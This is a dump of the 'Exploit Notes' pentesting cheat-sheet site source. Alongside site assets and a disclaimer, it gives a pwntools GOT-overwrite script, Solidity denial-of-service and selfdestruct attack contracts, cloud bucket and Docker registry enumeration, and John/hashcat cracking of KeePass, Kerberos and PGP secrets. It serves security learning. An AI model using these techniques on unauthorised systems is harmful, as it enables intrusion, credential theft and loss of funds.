-------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_white.png -------------------------------------------------------------------------------- /src/assets/img/favicon.ico: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/favicon.ico -------------------------------------------------------------------------------- /src/assets/img/github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/github.png -------------------------------------------------------------------------------- /src/assets/img/hash_cracker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/hash_cracker.png -------------------------------------------------------------------------------- /src/assets/img/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/icon.png -------------------------------------------------------------------------------- /src/assets/img/icon_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/icon_bg.png -------------------------------------------------------------------------------- /src/assets/img/kofi_cropped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/kofi_cropped.png -------------------------------------------------------------------------------- /src/assets/img/kofi_s.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/kofi_s.png -------------------------------------------------------------------------------- /src/assets/img/malware-notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/malware-notes.png -------------------------------------------------------------------------------- /src/assets/img/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/screenshot.png -------------------------------------------------------------------------------- /src/assets/img/security-links.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/security-links.png -------------------------------------------------------------------------------- /src/assets/img/theoffseclibrary.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/theoffseclibrary.png -------------------------------------------------------------------------------- /src/assets/img/title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/title.png -------------------------------------------------------------------------------- /src/assets/img/twitter.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/twitter.png -------------------------------------------------------------------------------- /src/assets/img/x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/x.png -------------------------------------------------------------------------------- /src/assets/img/x.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/assets/js/exploit.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', () => { 2 | scrollToRelatedPage(); 3 | 4 | // Scroll to the current exploit in exploits related. 5 | function scrollToRelatedPage() { 6 | const scrollTargetElem = document.getElementById('scroll-target'); 7 | if (scrollTargetElem) { 8 | const leftSideInner = document.getElementById('exploit-leftside-inner'); 9 | leftSideInner.scroll(0, scrollTargetElem.offsetTop - 300); 10 | } 11 | } 12 | }); 13 | -------------------------------------------------------------------------------- /src/assets/js/hamburger.js: -------------------------------------------------------------------------------- 1 | document.querySelector('.hamburger')?.addEventListener('click', () => { 2 | const navLinksElem = document.querySelector('.nav-links'); 3 | const hamburgerElem = document.querySelector('.hamburger'); 4 | const linesElem = document.querySelector('.hamburger .lines'); 5 | const lineCrossElem = document.querySelector('.hamburger .line-cross'); 6 | if (navLinksElem && hamburgerElem && linesElem && lineCrossElem) { 7 | navLinksElem.classList.toggle('hidden'); 8 | navLinksElem.classList.toggle('nav-links-hamburger'); 9 | 
linesElem.classList.toggle('hidden'); 10 | lineCrossElem.classList.toggle('hidden'); 11 | } 12 | }); -------------------------------------------------------------------------------- /src/disclaimer.vto: -------------------------------------------------------------------------------- 1 | --- 2 | layout: layouts/base.vto 3 | bodyClass: body-disclaimer 4 | --- 5 | 6 |
7 |

Disclaimer

8 |
9 |

10 | Exploit Notes is only for educational purposes or authorized penetration testing, not for attacking servers that you are not authorized to test. 11 | This site will not take any responsibility even if you attack a server illegally or cause damage unintentionally. 12 | Please use the contents at your own risk. 13 |

14 |

15 | The contents are not original but are based on information from the internet that the author has actually tried and confirmed to work. 16 | Although the author strives to keep the content of this site as up to date as possible, there is no guarantee that it will always be current. 17 |

18 |

19 | I'm not a security expert, just an enthusiast, so the contents written are not necessarily accurate. 20 |

21 |
22 |
23 | 24 | -------------------------------------------------------------------------------- /src/exploit/_data.yml: -------------------------------------------------------------------------------- 1 | type: exploit 2 | layout: layouts/exploit.vto 3 | date: Git Last Modified -------------------------------------------------------------------------------- /src/exploit/audio/_data.yml: -------------------------------------------------------------------------------- 1 | category1: audio 2 | related_menus: 3 | - title: Audio 4 | id: others -------------------------------------------------------------------------------- /src/exploit/audio/sstv.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SSTV (Slow-scan Television) 3 | description: SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files. 4 | tags: 5 | - Audio 6 | - Spectrogram 7 | refs: 8 | - https://oe5lxr.at/decode-sstv-with-mmsstv/ 9 | date: 2023-07-19 10 | draft: false 11 | --- 12 | 13 | ## Decode SSTV 14 | 15 | There are some online tools available as below. 
16 | 17 | - **MMSSTV** (for Windows) 18 | - **QSSTV** (for Linux) 19 | - **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool) -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | category1: binary-exploitation 2 | related_menus: 3 | - title: Method 4 | id: method 5 | - title: Cheatsheet 6 | id: cheatsheet 7 | - title: Binary Exploitation 8 | id: others -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/cheatsheet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cheatsheet -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/_data.yml: -------------------------------------------------------------------------------- 1 | category2: method -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-got.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with GOT 3 | description: GOT (Global Offset Table) is a section of a computer program’s memory used to enable computer program code compiled as an ELF file to run correctly. 
4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-12 8 | draft: false 9 | --- 10 | 11 | ## GOT Overriding 12 | 13 | ```python 14 | from pwn import * 15 | 16 | context.update(arch="amd64", os="linux") 17 | 18 | filepath = "./example" 19 | 20 | elf = context.binary = ELF(filepath) 21 | 22 | p = process(filepath) # p = remote('example.com', '1337') 23 | 24 | p.clean() 25 | p.sendline() 26 | p.clean() 27 | 28 | payload = fmtstr_payload(10, {elf.got['puts'] : elf.sym['holidays']}) 29 | p.sendline(payload) 30 | p.interactive() 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-ret2plt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with ret2plt 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-02-12 8 | draft: false 9 | --- 10 | 11 | No content yet. -------------------------------------------------------------------------------- /src/exploit/binary-exploitation/method/binary-exploitation-with-time-guessing.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Binary Exploitation with Time Guessing 3 | description: 4 | tags: 5 | - Reverse Engineering 6 | refs: 7 | date: 2023-03-01 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | ./example 15 | 16 | Guess the number: 1111 17 | You losed. The correct answer is 1475693029 18 | 19 | Guess the number: 12345678 20 | You losed. The correct answer is 8246712747 21 | ``` 22 | 23 | If we find a binary that asks us to guess the correct time (or time-base number), we can bypass it using a Pipe in command line. 24 | 25 |
26 | 27 | ## Exploitation 28 | 29 | ```bash 30 | # tr -dc '0-9': Extract the correct number provided by the binary. 31 | echo 1234 | ./example | tr -dc '0-9' | ./example 32 | ``` 33 | 34 | The above payload inputs ‘1234’ at first, then the binary returns the correct number. The **`tr`** command extracts this number and passes it to the second execution of the binary. 35 | Since the binary's answer depends on the time, we can bypass the program by passing the previous answer instantly. -------------------------------------------------------------------------------- /src/exploit/blockchain/_data.yaml: -------------------------------------------------------------------------------- 1 | category1: blockchain 2 | related_menus: 3 | - title: Smart Contract 4 | id: smart-contract 5 | - title: Others 6 | id: others -------------------------------------------------------------------------------- /src/exploit/blockchain/blockchain-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Blockchain Pentesting 3 | description: A type of Digital Ledger Technology (DLT) that consists of a growing list of records, called blocks, that are securely linked together using cryptography. 4 | tags: 5 | - Blockchain 6 | - Web3 7 | refs: 8 | date: 2023-10-11 9 | draft: false 10 | --- 11 | 12 | ## Explore Transactions 13 | 14 | - [blockchain.com](https://www.blockchain.com/explorer) 15 | 16 | The most popular and trusted block explorer and crypto transaction search engine. 17 | 18 | - [Block Explorer](https://blockexplorer.com/) 19 | 20 | The Handshake Block Explorer. 21 | 22 | - [etherchain.org](https://www.etherchain.org/) 23 | 24 | The Ethereum blockchain explorer. 25 | 26 | - [OXT](https://oxt.me/) 27 | 28 | 29 |
30 | 31 | ## Explore Wallets 32 | 33 | - [Wallet Explorer](https://www.walletexplorer.com/) 34 | -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/_data.yaml: -------------------------------------------------------------------------------- 1 | category2: smart-contract -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-contarct-address-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Contract Address Recovery 3 | description: 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed 9 | - https://blog.dixitaditya.com/ethernaut-level-17-recovery 10 | date: 2023-09-30 11 | draft: false 12 | --- 13 | 14 | ## Create a Contract for Recovery Address 15 | 16 | This contract can compute the contract address which has been lost. 17 | 18 | ```js 19 | // SPDX-License-Identifier: MIT 20 | pragma solidity ^0.8.0; 21 | 22 | contract ContractRecovery { 23 | 24 | constructor(address _creatorAddress) { 25 | address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01)))))); 26 | // some code here ... 27 | } 28 | } 29 | ``` 30 | 31 | Another way is to use [Etherscan](https://etherscan.io/) transaction history. 
-------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-conversion.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Conversion 3 | description: 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://www.tutorialspoint.com/solidity/solidity_conversions.htm 9 | - https://coinsbench.com/12-privacy-ethernaut-explained-8ee480f303f2 10 | date: 2023-09-30 11 | draft: false 12 | --- 13 | 14 | ## Explicit Conversion 15 | 16 | When we cast a smaller type to a bigger type, there's no problem. However, when we cast a bigger type to a smaller type, data may be partially lost. 17 | 18 | ### Uint/Int 19 | 20 | ```js 21 | // uint32 -> uint16 22 | uint32 a = 0x12345678; 23 | uint16 b = uint16(a); // 0x5678 24 | 25 | // uint16 -> uint32 26 | uint16 a = 0x1234; 27 | uint32 b = uint32(a); // 0x00001234 28 | ``` 29 | 30 | ### Bytes 31 | 32 | ```js 33 | // bytes2 -> bytes1 34 | bytes2 a = 0x1234; 35 | bytes1 b = bytes1(a); // 0x12 36 | 37 | // bytes2 -> bytes4 38 | bytes2 a = 0x1234; 39 | bytes4 b = bytes4(a); // 0x12340000 40 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-denial-of-service-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Denial of Service Attack 3 | description: We can deny the Solidity execution by consuming all gas in various ways. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | - https://coinsbench.com/20-denial-ethernaut-explained-92bc3f7562ec 9 | date: 2023-09-30 10 | draft: false 11 | --- 12 | 13 | ## DoS with Assembly Invalid Function 14 | 15 | The `invalid()` opcode in inline assembly consumes all the gas and causes DoS for the contract.
16 | 17 | ```js 18 | // SPDX-License-Identifier: MIT 19 | pragma solidity ^0.8.0; 20 | 21 | contract Victim { 22 | address public owner; 23 | uint public balance; 24 | 25 | function withdrawUser(address _address) { 26 | (bool success, ) = _address.call{value: balance}(""); 27 | // Some code ... 28 | } 29 | } 30 | 31 | contract Attack { 32 | Victim target; 33 | 34 | constructor(address _targetAddress) { 35 | target = Victim(_targetAddress); 36 | target.withdrawUser(address(this)); 37 | } 38 | 39 | fallback() payable external { 40 | assembly { 41 | invalid() 42 | } 43 | } 44 | } 45 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Overflow & Underflow 3 | description: Solidity is vulnerable to overflow and underflow of uint variables in versions below 0.8. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-27 9 | draft: false 10 | --- 11 | 12 | ## Overflow 13 | 14 | ```js 15 | uint8 value = 255; 16 | value++; 17 | // Result: value = 0 18 | ``` 19 | 20 |
21 | 22 | ## Underflow 23 | 24 | ```js 25 | uint8 value = 0; 26 | value--; 27 | // Result: value = 255 28 | ``` -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-self-destruct-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Self Destruct Attack 3 | description: Solidity’s ‘selfdestruct’ function may be used by an attacker to destroy a target contract and steal the balance. 4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-30 9 | draft: false 10 | --- 11 | 12 | ## Create a Malicious Contract for Destructing Contract 13 | 14 | ```js 15 | // SPDX-License-Identifier: MIT 16 | pragma solidity ^0.4.0; 17 | 18 | contract Attack { 19 | function attack(address _address) payable public { 20 | // the remaining Ether sent to _address when destructing 21 | selfdestruct(_address); 22 | } 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/blockchain/smart-contract/solidity-smart-contract-attack-methodology.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Solidity Smart Contract Attack Methodology 3 | description: When attacking a target contract, we can create an attack contract which loads the target contract and abuses it.
4 | tags: 5 | - Blockchain 6 | - Ethereum 7 | refs: 8 | date: 2023-09-30 9 | draft: false 10 | --- 11 | 12 | ## Create an Attack Contract 13 | 14 | ```js 15 | // SPDX-License-Identifier: MIT 16 | pragma solidity ^0.8.0; 17 | 18 | // Define interface for victim contract 19 | interface IVictim { 20 | // Set the Victim contract functions 21 | function example1() external; 22 | function example2(uint) external; 23 | } 24 | 25 | // Define Attack contract to compromise the victim contract 26 | contract Attack { 27 | IVictim public victim; 28 | 29 | constructor(address _victimAddress) { 30 | // Initialize Victim contract (interface) 31 | victim = IVictim(_victimAddress); 32 | } 33 | 34 | // Create a function to be used for attacking the victim contract 35 | function attack() public { 36 | victim.example1(); 37 | victim.example2(1); 38 | } 39 | } 40 | ``` -------------------------------------------------------------------------------- /src/exploit/cloud/_data.yml: -------------------------------------------------------------------------------- 1 | category1: cloud 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/cloud/gcp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GCP (Google Cloud Platform) Pentesting 3 | description: 4 | tags: 5 | - Cloud 6 | refs: 7 | - https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage 8 | date: 2024-12-18 9 | draft: false 10 | --- 11 | 12 | ## Install Google Cloud CLI 13 | 14 | Before pentesting GCP, we need to install a dedicated CLI tool. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details. 15 | After installing it, log in with your Google credentials: 16 | 17 | ```bash 18 | gcloud auth login 19 | ``` 20 | 21 |
22 | 23 | ## Google Storage 24 | 25 | Google Storage allows users to store static files at the URL: `https://storage.googleapis.com//`. 26 | We can enumerate the target storage as below: 27 | 28 | ```bash 29 | # Enumerate accessible directories/files from outside. 30 | fuzz -u https://storage.googleapis.com//FUZZ -w wordlist.txt -fc 403 31 | 32 | # Display directories/files 33 | gsutil ls gs:///example/ 34 | 35 | # Download a file 36 | gsutil cp gs:///example.txt 37 | 38 | # Get information for the bucket 39 | gsutil stat gs:///index.html 40 | ``` -------------------------------------------------------------------------------- /src/exploit/container/_data.yml: -------------------------------------------------------------------------------- 1 | category1: container 2 | related_menus: 3 | - title: Docker 4 | id: docker 5 | - title: Kubernetes 6 | id: kubernetes 7 | - title: Others 8 | id: others -------------------------------------------------------------------------------- /src/exploit/container/docker/_data.yml: -------------------------------------------------------------------------------- 1 | category2: docker -------------------------------------------------------------------------------- /src/exploit/container/docker/docker-registry-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Docker Registry Pentesting 3 | description: Docker Registry is a stateless, highly scalable server-side application that stores and lets you distribute Docker images. The default port is 5000. 4 | tags: 5 | - Container 6 | refs: 7 | - https://tbhaxor.com/exploiting-insecure-docker-registry/ 8 | date: 2024-02-08 9 | draft: false 10 | --- 11 | 12 | ## Endpoints 13 | 14 | ```bash 15 | /v2/_catalog 16 | /v2//tags/list 17 | # We can download the manifest given tag. 18 | /v2//manifests/ 19 | ``` 20 | 21 |
22 | 23 | ## Extract Layers 24 | 25 | After downloading the manifest with the endpoint above, look at its content and the blob sums (sha256:abcd...) in fsLayers. 26 | 27 | ```bash 28 | curl -so 1.tar https://example.com:5000/v2//blobs/sha256:abcd... 29 | tar -xvf 1.tar 30 | ``` 31 | 32 | After extracting the tar files, investigate the files and directories to find sensitive information. -------------------------------------------------------------------------------- /src/exploit/container/kubernetes/_data.yml: -------------------------------------------------------------------------------- 1 | category2: kubernetes -------------------------------------------------------------------------------- /src/exploit/cryptography/_data.yml: -------------------------------------------------------------------------------- 1 | category1: cryptography 2 | related_menus: 3 | - title: Algorithm 4 | id: algorithm 5 | - title: Key Derivation Function 6 | id: key-derivation-function 7 | - title: Tool 8 | id: tool 9 | - title: Math 10 | id: math 11 | - title: Bit Wise Operation 12 | id: bit-wise-operation 13 | - title: Conversion 14 | id: conversion -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/_data.yml: -------------------------------------------------------------------------------- 1 | category2: algorithm -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/atbash-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Atbash Cipher 3 | description: Atbash Cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet.
4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Atbash Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/caesar-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Caesar Cipher 3 | description: Caesar Cipher is one of the simplest and most widely known encryption techniques. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Caesar Cipher Encoder/Decoder](https://www.dcode.fr/caesar-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/camellia-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Camellia Cipher 3 | description: Camellia is a symmetric key block cipher with a block size of 128 bits and key sizes of 128, 192 and 256 bits. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | ```bash 14 | gpg --decrypt encrypted.gpg 15 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ecc.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ECC (Elliptic Curve Cryptography) 3 | description: Elliptic Curve Cryptography is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. 4 | tags: 5 | - Cryptography 6 | refs: 7 | - https://en.wikipedia.org/wiki/Elliptic-curve_cryptography 8 | date: 2023-09-09 9 | draft: false 10 | --- 11 | 12 | *This article has little content yet.*
13 | 14 | ## Formula 15 | 16 | ```python 17 | Y**2 = X**3 + a*X + b 18 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ecdsa.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ECDSA (Elliptic Curve Digital Signature Algorithm) 3 | description: ECDSA offers a variant of the DSA which uses elliptic curve cryptography. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-09-09 8 | draft: false 9 | --- 10 | 11 | ## ECDSA in Python 12 | 13 | [python-ecdsa](https://github.com/tlsfuzzer/python-ecdsa) can be used for ECDSA. 14 | 15 | ```bash 16 | pip install ecdsa 17 | ``` 18 | 19 | ### Verifying 20 | 21 | ```python 22 | from ecdsa import SigningKey, NIST384p 23 | 24 | sk = SigningKey.generate(curve=NIST384p) 25 | vk = sk.verifying_key 26 | signature = sk.sign(b"message") 27 | print(vk.verify(signature, b"message")) 28 | ``` 29 | 30 | ### Generating SigningKey 31 | 32 | ```python 33 | from ecdsa import SigningKey, NIST384p 34 | 35 | sk = SigningKey.generate(curve=NIST384p) 36 | sk_string = sk.to_string() 37 | print(sk_string.hex()) 38 | 39 | sk2 = SigningKey.from_string(sk_string, curve=NIST384p) 40 | print(sk2.to_string().hex()) 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/fernet.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Fernet 3 | description: Fernet is a symmetric encryption cryptography. 
4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-07 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | There are many online tools such as… 14 | 15 | - [https://asecuritysite.com/tokens/ferdecode](https://asecuritysite.com/tokens/ferdecode) 16 | - [https://8gwifi.org/fernet.jsp](https://8gwifi.org/fernet.jsp) 17 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/hmac.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HMAC 3 | description: An HMAC is a specific type of message authentication code involving a cryptographic hash function and a secret cryptographic key. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-10 8 | draft: false 9 | --- 10 | 11 | ## Install HMAC Commands 12 | 13 | If you don’t have `hmac256` command, you need to install the package. 14 | 15 | ```bash 16 | # In debian 17 | sudo apt install libgcrypt20-dev 18 | ``` 19 | 20 |
21 | 22 | ## Decrypt 23 | 24 | ```bash 25 | # HMAC 26 | hmac256 example.txt 27 | 28 | # HMAC-SHA256 29 | sha256hmac example.txt --key 30 | 31 | # HMAC-SHA384 32 | sha384hmac example.txt --key 33 | 34 | # HMAC-SHA512 35 | sha512hmac example.txt --key 36 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/kdbx-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: KDBX Files 3 | description: A KDBX file is a password database created by KeePass Password Safe. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2024-10-25 8 | draft: false 9 | --- 10 | 11 | ## Open KDBX File 12 | 13 | If the KeePass software is not installed on our system, run the following command. 14 | 15 | ```bash 16 | sudo apt install keepassx 17 | # or 18 | sudo apt install keepass2 19 | ``` 20 | 21 | To open **KeePass**, run the following command. 22 | 23 | ```sh 24 | keepassx 25 | # or 26 | keepass2 27 | ``` 28 | 29 | ### Copy Password 30 | 31 | Right-click on the password value, then click **Copy Password**. 32 | 33 |
34 | 35 | ## Crack KDBX Password 36 | 37 | When opening a KDBX file in KeePass, if you’re asked for the Master Key, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack the password. 38 | 39 | ### 1. Convert to Hash 40 | 41 | ```sh 42 | keepass2john example.kdbx > hash.txt 43 | ``` 44 | 45 | ### 2. Crack the Hash 46 | 47 | ```sh 48 | john --wordlist=wordlist.txt hash.txt 49 | # or 50 | hashcat -m 13400 -a 0 hash.txt wordlist.txt 51 | ``` 52 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/kerberos-tgt-cracking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Kerberos TGT Cracking 3 | description: The Kerberos Ticket-Granting Ticket (TGT) is created during Kerberos authentication. Users can access the network using these tickets. These are often saved with the `.kirbi` extension and we may be able to crack them. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-11-11 8 | draft: false 9 | --- 10 | 11 | ## Crack TGT 12 | 13 | First, convert the TGT to a hash which can be cracked by **John The Ripper**. 14 | 15 | ```sh 16 | kirbi2john tgt.kirbi > hash.txt 17 | # or 18 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt 19 | ``` 20 | 21 | Then crack it.
22 | 23 | ```sh 24 | john --wordlist=wordlist.txt hash.txt 25 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/length-extension-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Length Extension Attack 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | - https://en.wikipedia.org/wiki/Length_extension_attack 8 | - https://github.com/iagox86/hash_extender 9 | date: 2023-07-28 10 | draft: false 11 | --- 12 | 13 | ## Exploitation 14 | 15 | We can exploit the vulnerability with [hash_extender](https://github.com/iagox86/hash_extender). 16 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/md4-md5.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: MD4, MD5 3 | description: MD4 and MD5 (message-digest) are widely used hash functions producing a 128-bit hash value. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-01-05 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[MD5 Center](https://md5.gromweb.com/)** 14 | - **[CrackStation](https://crackstation.net/)** 15 | - **[Hashes.com](https://hashes.com/en/decrypt/hash)** 16 | 17 |
18 | 19 | ## Decrypt 20 | 21 | ### MD4 22 | 23 | Put the md4 hash into the file. 24 | 25 | ```sh 26 | echo -n '' > hash.txt 27 | ``` 28 | 29 | Then crack it. 30 | 31 | ```sh 32 | john --format=raw-md4 --wordlist=wordlist.txt hash.txt 33 | # or 34 | hashcat -m 900 -a 0 hash.txt wordlist.txt 35 | ``` 36 | 37 | ### MD5 38 | 39 | Put the md5 hash into the file. 40 | 41 | ```sh 42 | echo -n '' > hash.txt 43 | ``` 44 | 45 | Then crack it. 46 | 47 | ```sh 48 | john --format=raw-md5 --wordlist=wordlist.txt hash.txt 49 | # or 50 | hashcat -m 0 -a 0 hash.txt wordlist.txt 51 | ``` 52 | 53 |
54 | 55 | ## Encrypt 56 | 57 | ### MD4 58 | 59 | No contents yet 60 | 61 | ### MD5 62 | 63 | ```sh 64 | echo -n 'hello' | md5sum 65 | md5sum sample.txt 66 | ``` 67 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/multi-tap-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Multi-Tap Cipher 3 | description: Multi-Tap refers to a text entry system for mobile phones. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[Multitap Decoder](https://www.dcode.fr/multitap-abc-cipher)** 14 | 15 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pem.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PEM (Privacy Enhanced Mail) 3 | description: PEM uses RSA encryption. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First of all, you need to format the PEM file so that John can recognize it. 14 | 15 | ```sh 16 | pem2john example.pem > hash.txt 17 | ``` 18 | 19 | Crack the hash. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` 24 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pgp.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PGP (Pretty Good Privacy) 3 | description: PGP is an encryption program that provides cryptographic privacy and authentication for data communication. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-20 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First off, you need to format the private key so that John can recognize it.
14 | 15 | ```sh 16 | gpg2john private.key > hash.txt 17 | ``` 18 | 19 | Crack the passphrase using John the Ripper. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` 24 | 25 |
